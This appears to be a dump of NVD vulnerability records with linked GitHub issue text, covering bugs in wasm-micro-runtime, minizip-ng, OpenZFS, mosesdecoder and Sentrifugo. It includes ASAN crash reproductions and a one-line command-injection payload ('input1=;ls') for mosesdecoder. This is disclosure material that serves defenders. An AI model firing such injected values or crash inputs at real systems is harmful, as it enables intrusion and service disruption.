{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "http://bytecode.com" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://wasm-micro-runtime.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/bytecodealliance/wasm-micro-runtime/issues/2726" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/bytecodealliance/wasm-micro-runtime/pull/2734/commits/4785d91b16dd49c09a96835de2d9c7b077543fa4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "http://bytecode.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://wasm-micro-runtime.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/bytecodealliance/wasm-micro-runtime/issues/2726" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/bytecodealliance/wasm-micro-runtime/pull/2734/commits/4785d91b16dd49c09a96835de2d9c7b077543fa4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bytecodealliance:webassembly_micro_runtime:1.2.3:*:*:*:*:*:*:*", "matchCriteriaId": "438EEBB6-205A-496A-A009-321357C86154", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/bytecodealliance/wasm-micro-runtime/issues/2726
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "bytecodealliance", "wasm-micro-runtime" ]
## Environments **OS** : Ubuntu 18.04 5.4.0-150-generic **Commit** : 52db362b897221c2a438197a0f2e4a9a300becd4 **Version** : iwasm 1.2.3 ## Vulnerability Description **Affected Tool** : iwasm (linux build) **Affected Version** : = 1.2.3 **Impact** : Heap out of bounds read (size of 1) * There is Heap out of bound read of size 1 in wasm_loader_prepare_bytecode function in /core/iwasm/interpreter/wasm_loader.c:7141 ## PoC **1. Input File** [heap-overflow-poc.zip](https://github.com/bytecodealliance/wasm-micro-runtime/files/13270590/heap-overflow-poc.zip) **2. Reproduce** ```shell $ ~/wasm-micro-runtime/product-mini/platforms/linux/build/iwasm poc ``` **3. ASAN** ```shell $ ~/wasm-micro-runtime/product-mini/platforms/linux/build/iwasm poc ==14712==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6030000000ea at pc 0x564acc92478f bp 0x7ffe13134890 sp 0x7ffe13134880 READ of size 1 at 0x6030000000ea thread T0 #0 0x564acc92478e in wasm_loader_prepare_bytecode /home/dskim/wasm-micro-runtime/core/iwasm/interpreter/wasm_loader.c:7141 #1 0x564acc92478e in load_from_sections /home/dskim/wasm-micro-runtime/core/iwasm/interpreter/wasm_loader.c:3561 #2 0x564acc929266 in load /home/dskim/wasm-micro-runtime/core/iwasm/interpreter/wasm_loader.c:3921 #3 0x564acc929266 in wasm_loader_load /home/dskim/wasm-micro-runtime/core/iwasm/interpreter/wasm_loader.c:4088 #4 0x564acc80e8cf in wasm_runtime_load /home/dskim/wasm-micro-runtime/core/iwasm/common/wasm_runtime_common.c:1228 #5 0x564acc7fc090 in main /home/dskim/wasm-micro-runtime/product-mini/platforms/linux/../posix/main.c:931 #6 0x7f0c717bfc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #7 0x564acc800529 in _start (/home/dskim/wasm-micro-runtime/product-mini/platforms/linux/build/iwasm+0x24529) 0x6030000000ea is located 0 bytes to the right of 26-byte region [0x6030000000d0,0x6030000000ea) allocated by thread T0 here: #0 0x7f0c7242eb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x564acc801729 in bh_read_file_to_buffer /home/dskim/wasm-micro-runtime/core/shared/utils/uncommon/bh_read_file.c:96 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/dskim/wasm-micro-runtime/core/iwasm/interpreter/wasm_loader.c:7141 in wasm_loader_prepare_bytecode Shadow bytes around the buggy address: 0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff8000: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 =>0x0c067fff8010: 00 00 fa fa fd fd fd fd fa fa 00 00 00[02]fa fa 0x0c067fff8020: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 0x0c067fff8030: fa fa 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c067fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==14712==ABORTING ```
Heap overflow in wasm_loader_prepare_bytecode
https://api.github.com/repos/bytecodealliance/wasm-micro-runtime/issues/2726/comments
2
2023-11-06T17:37:06Z
2024-01-05T11:35:46Z
https://github.com/bytecodealliance/wasm-micro-runtime/issues/2726
1,979,691,341
2,726
5,769
CVE-2023-48107
2023-11-22T23:15:10.663
Buffer Overflow vulnerability in zlib-ng minizip-ng v.4.0.2 allows an attacker to execute arbitrary code via a crafted file to the mz_path_has_slash function in the mz_os.c file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/zlib-ng/minizip-ng/issues/739" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2P3BFGECWPSK5RYDI5GCSW6N2VIXBTUO/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X4BNF4ZDYQZP4JWEY6DBSYKALXQC5QM4/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/zlib-ng/minizip-ng/issues/739" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2P3BFGECWPSK5RYDI5GCSW6N2VIXBTUO/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X4BNF4ZDYQZP4JWEY6DBSYKALXQC5QM4/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zlib-ng:minizip-ng:4.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "D65B2CB9-EB98-4AA7-AEC5-FE76A1022E72", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/zlib-ng/minizip-ng/issues/739
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "zlib-ng", "minizip-ng" ]
#### Description heap-buffer-overflow (/minizip-ng/build/minizip+0x8d5a) in mz_path_has_slash #### Version ```bash $ ./minizip -h minizip-ng 4.0.2 - https://github.com/zlib-ng/minizip-ng --------------------------------------------------- -h Usage: minizip [-x][-d dir|-l|-e][-o][-f][-y][-c cp][-a][-0 to -9][-b|-m|-t][-k 512][-p pwd][-s] file.zip [files] -x Extract files -l List files -d Destination directory -e Erase files -o Overwrite existing files -c File names use cp437 encoding (or specified codepage) -a Append to existing zip file -i Include full path of files -f Follow symbolic links -y Store symbolic links -v Verbose info -0 Store only -1 Compress faster -9 Compress better -k Disk size in KB -z Zip central directory -p Encryption password -s AES encryption -b BZIP2 compression -m LZMA compression -n XZ compression -t ZSTD compression ``` #### Replay ```bash git clone https://github.com/zlib-ng/minizip-ng.git cd minizip-ng/ export AFL_USE_ASAN=1 CC="gcc -fsanitize=address" CXX="g++ -fsanitize=address" cmake -S . -B build -D MZ_BUILD_TESTS=ON cmake --build build ./minizip -x -o poc0 ``` #### ASAN ```bash -x -o /root/poc/minizip/poc0 Archive /root/poc/minizip/poc0 Extracting .\ ================================================================= ==1735959==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000000cf at pc 0x55555555cd5b bp 0x7fffffffdd20 sp 0x7fffffffdd10 READ of size 1 at 0x6020000000cf thread T0 #0 0x55555555cd5a in mz_path_has_slash (/root/test/minizip-ng/build/minizip+0x8d5a) #1 0x555555572ac1 in mz_zip_reader_entry_save_file (/root/test/minizip-ng/build/minizip+0x1eac1) #2 0x555555573ceb in mz_zip_reader_save_all (/root/test/minizip-ng/build/minizip+0x1fceb) #3 0x55555555af70 in minizip_extract (/root/test/minizip-ng/build/minizip+0x6f70) #4 0x55555555c7ec in main (/root/test/minizip-ng/build/minizip+0x87ec) #5 0x7ffff73a9082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) #6 0x555555558aed in _start (/root/test/minizip-ng/build/minizip+0x4aed) 0x6020000000cf is located 1 bytes to the left of 1-byte region [0x6020000000d0,0x6020000000d1) allocated by thread T0 here: #0 0x7ffff76a0a06 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:153 #1 0x555555572749 in mz_zip_reader_entry_save_file (/root/test/minizip-ng/build/minizip+0x1e749) #2 0x555555573ceb in mz_zip_reader_save_all (/root/test/minizip-ng/build/minizip+0x1fceb) #3 0x55555555af70 in minizip_extract (/root/test/minizip-ng/build/minizip+0x6f70) #4 0x55555555c7ec in main (/root/test/minizip-ng/build/minizip+0x87ec) #5 0x7ffff73a9082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/test/minizip-ng/build/minizip+0x8d5a) in mz_path_has_slash Shadow bytes around the buggy address: 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa fd fd fa fa fd fd fa fa 00 07 fa fa 00 01 =>0x0c047fff8010: fa fa 00 01 fa fa 00 01 fa[fa]01 fa fa fa 01 fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1735959==ABORTING ``` #### POC https://github.com/Akane0721/POC/blob/f37d805631e0a15bea1f15b6e1edfb3246a2e0fc/minizip-ng/poc0 #### Environment ``` Ubuntu 20.04 Clang 10.0.0 gcc 9.4.0 ```
Heap-buffer-overflow in mz_os.c:71 mz_path_has_slash
https://api.github.com/repos/zlib-ng/minizip-ng/issues/739/comments
13
2023-11-08T12:19:50Z
2023-11-13T18:05:37Z
https://github.com/zlib-ng/minizip-ng/issues/739
1,983,475,261
739
5,770
CVE-2023-49298
2023-11-24T19:15:07.587
OpenZFS through 2.1.13 and 2.2.x through 2.2.1, in certain scenarios involving applications that try to rely on efficient copying of file data, can replace file contents with zero-valued bytes and thus potentially disable security mechanisms. NOTE: this issue is not always security related, but can be security related in realistic situations. A possible example is cp, from a recent GNU Core Utilities (coreutils) version, when attempting to preserve a rule set for denying unauthorized access. (One might use cp when configuring access control, such as with the /etc/hosts.deny file specified in the IBM Support reference.) NOTE: this issue occurs less often in version 2.2.1, and in versions before 2.1.4, because of the default configuration in those versions.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=275308" }, { "source": "cve@mitre.org", "tags": null, "url": "https://bugs.gentoo.org/917224" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/openzfs/zfs/issues/15526" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Vendor Advisory" ], "url": "https://github.com/openzfs/zfs/pull/15571" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/openzfs/zfs/releases/tag/zfs-2.1.14" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/openzfs/zfs/releases/tag/zfs-2.2.2" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/03/msg00019.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://news.ycombinator.com/item?id=38405731" }, { "source": "cve@mitre.org", "tags": null, "url": "https://news.ycombinator.com/item?id=38770168" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://web.archive.org/web/20231124172959/https://www.ibm.com/support/pages/how-remove-missing%C2%A0newline%C2%A0or%C2%A0line%C2%A0too%C2%A0long-error-etchostsallow%C2%A0and%C2%A0etchostsdeny-files" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.theregister.com/2023/12/04/two_new_versions_of_openzfs/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=275308" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://bugs.gentoo.org/917224" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/openzfs/zfs/issues/15526" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Vendor Advisory" ], "url": "https://github.com/openzfs/zfs/pull/15571" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/openzfs/zfs/releases/tag/zfs-2.1.14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/openzfs/zfs/releases/tag/zfs-2.2.2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/03/msg00019.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://news.ycombinator.com/item?id=38405731" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://news.ycombinator.com/item?id=38770168" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://web.archive.org/web/20231124172959/https://www.ibm.com/support/pages/how-remove-missing%C2%A0newline%C2%A0or%C2%A0line%C2%A0too%C2%A0long-error-etchostsallow%C2%A0and%C2%A0etchostsdeny-files" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.theregister.com/2023/12/04/two_new_versions_of_openzfs/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openzfs:openzfs:*:*:*:*:*:*:*:*", "matchCriteriaId": "FCB5B44F-BC91-4DBC-A67B-96D577834ACB", "versionEndExcluding": null, "versionEndIncluding": "2.1.13", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:openzfs:openzfs:2.2.0:-:*:*:*:*:*:*", "matchCriteriaId": "9119E75A-14D2-4C8A-9AD0-97257DE45EC9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:freebsd:freebsd:14.0:-:*:*:*:*:*:*", "matchCriteriaId": "FA25530A-133C-4D7C-8993-D5C42D79A0B5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "639" ]
639
https://github.com/openzfs/zfs/issues/15526
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "openzfs", "zfs" ]
<!-- Please fill out the following template, which will help other contributors address your issue. --> <!-- Thank you for reporting an issue. *IMPORTANT* - Please check our issue tracker before opening a new issue. Additional valuable information can be found in the OpenZFS documentation and mailing list archives. Please fill in as much of the template as possible. --> ### System information <!-- add version after "|" character --> Type | Version/Name --- | --- Distribution Name | Gentoo Distribution Version | (rolling) Kernel Version | 6.5.11 Architecture | amd64 OpenZFS Version | 2.2.0 Reference | https://bugs.gentoo.org/917224 <!-- Command to find OpenZFS version: zfs version Commands to find kernel version: uname -r # Linux freebsd-version -r # FreeBSD --> ### Describe the problem you're observing When installing the Go compiler with Portage, many of the internal compiler commands have been corrupted by having most of the files replaced by zeros. ``` $ file /usr/lib/go/pkg/tool/linux_amd64/* | grep data /usr/lib/go/pkg/tool/linux_amd64/asm: data /usr/lib/go/pkg/tool/linux_amd64/cgo: data /usr/lib/go/pkg/tool/linux_amd64/compile: data /usr/lib/go/pkg/tool/linux_amd64/covdata: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=xHCzRQtrkEP-Bbxql0SF/zxsofCJFlBoPlUclgwBG/TrsgK6SKiY4q6TIhyBjU/UwcISvZgqfQaEf3Kr_Tq, not stripped /usr/lib/go/pkg/tool/linux_amd64/cover: data /usr/lib/go/pkg/tool/linux_amd64/link: data /usr/lib/go/pkg/tool/linux_amd64/vet: data $ hexdump /usr/lib/go/pkg/tool/linux_amd64/compile 0000000 0000 0000 0000 0000 0000 0000 0000 0000 * 0000fa0 0000 0000 0000 0000 0000 0000 5a41 3447 0000fb0 336a 3933 5a49 4f2d 6641 6342 7a6d 3646 0000fc0 582f 5930 5a4d 6761 5659 6f34 6d39 4130 0000fd0 4957 6555 2f67 686d 6a63 6675 5976 4e6a 0000fe0 346c 3070 5157 494e 5f41 5a2f 336d 6342 0000ff0 4e6d 4a4f 306c 4277 4a72 774d 4d41 006c 0001000 0000 0000 0000 0000 0000 0000 0000 0000 * 0ac9280 5a41 3447 336a 3933 5a49 4f2d 6641 6342 0ac9290 7a6d 3646 582f 5930 5a4d 6761 5659 6f34 0ac92a0 6d39 4130 4957 6555 2f67 686d 6a63 6675 0ac92b0 5976 4e6a 346c 3070 5157 494e 5f41 5a2f 0ac92c0 336d 6342 4e6d 4a4f 306c 4277 4a72 774d 0ac92d0 4d41 006c 0000 0000 0000 0000 0000 0000 0ac92e0 0000 0000 0000 0000 0000 0000 0000 0000 * 1139380 0000 0000 0000 0000 0000 1139389 ``` I'm able to reproduce on two separate machines running 6.5.11 and ZFS 2.2.0. ZFS does not see any errors with the pool. ``` $ zpool status pool: zroot state: ONLINE scan: scrub repaired 0B in 00:07:24 with 0 errors on Wed Nov 1 00:06:45 2023 config: NAME STATE READ WRITE CKSUM zroot ONLINE 0 0 0 nvme-WDS100T1X0E-XXXXXX_XXXXXXXXXXXX-part2 ONLINE 0 0 0 errors: No known data errors $ zpool status -t pool: zroot state: ONLINE scan: scrub repaired 0B in 00:07:24 with 0 errors on Wed Nov 1 00:06:45 2023 config: NAME STATE READ WRITE CKSUM zroot ONLINE 0 0 0 nvme-WDS100T1X0E-XXXXXX_XXXXXXXXXXXX-part2 ONLINE 0 0 0 (100% trimmed, completed at Tue 31 Oct 2023 11:15:47 PM GMT) errors: No known data errors ```` ### Describe how to reproduce the problem 1. On a system running ZFS 2.2.0, upgrade pools to enable the block cloning feature. 2. `emerge -1 dev-lang/go`, where Portage's TMPDIR is on ZFS. 3. After a successful install of Go, the files in `/usr/lib/go/pkg/tool/linux_amd64/compile` are corrupted. I was able to reproduce with and without Portage's "native-extensions" feature. I was unable to reproduce after changing Portage's TMPDIR to another filesystem (such as tmpfs). ### Include any warning/errors/backtraces from the system logs <!-- *IMPORTANT* - Please mark logs and text output from terminal commands or else Github will not display them correctly. An example is provided below. Example: ``` this is an example how log text should be marked (wrap it with ```) ``` -->
some copied files are corrupted (chunks replaced by zeros)
https://api.github.com/repos/openzfs/zfs/issues/15526/comments
338
2023-11-14T13:30:40Z
2024-03-13T01:57:10Z
https://github.com/openzfs/zfs/issues/15526
1,992,751,216
15,526
5,771
CVE-2023-6309
2023-11-27T02:15:42.797
A vulnerability, which was classified as critical, was found in moses-smt mosesdecoder up to 4.0. This affects an unknown part of the file contrib/iSenWeb/trans_result.php. The manipulation of the argument input1 leads to os command injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246135.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 5.2, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 5.1, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "VDB Entry" ], "url": "https://github.com/moses-smt/mosesdecoder/issues/237" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.246135" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.246135" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "VDB Entry" ], "url": "https://github.com/moses-smt/mosesdecoder/issues/237" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.246135" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.246135" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:moses-smt:mosesdecoder:*:*:*:*:*:*:*:*", "matchCriteriaId": "8F7BF510-5916-4C34-9DB3-7EB4C12A9DE3", "versionEndExcluding": "4.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/moses-smt/mosesdecoder/issues/237
[ "Exploit", "Issue Tracking", "VDB Entry" ]
github.com
[ "moses-smt", "mosesdecoder" ]
https://github.com/moses-smt/mosesdecoder/blob/master/contrib/iSenWeb/trans_result.php poc: input1=;ls
webshell exists in the project
https://api.github.com/repos/moses-smt/mosesdecoder/issues/237/comments
3
2023-11-03T02:31:42Z
2025-01-16T18:24:05Z
https://github.com/moses-smt/mosesdecoder/issues/237
1,975,366,922
237
5,772
CVE-2023-29770
2023-11-28T00:15:07.033
In Sentrifugo 3.5, the AssetsController::uploadsaveAction function allows an authenticated attacker to upload any file without extension filtering.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/sapplica/sentrifugo" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/sapplica/sentrifugo/issues/384" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/sapplica/sentrifugo" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/sapplica/sentrifugo/issues/384" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sapplica:sentrifugo:3.5:*:*:*:*:*:*:*", "matchCriteriaId": "9EC47DC7-B208-4E30-8B09-8FBCD3302E8D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/sapplica/sentrifugo/issues/384
[ "Exploit", "Third Party Advisory" ]
github.com
[ "sapplica", "sentrifugo" ]
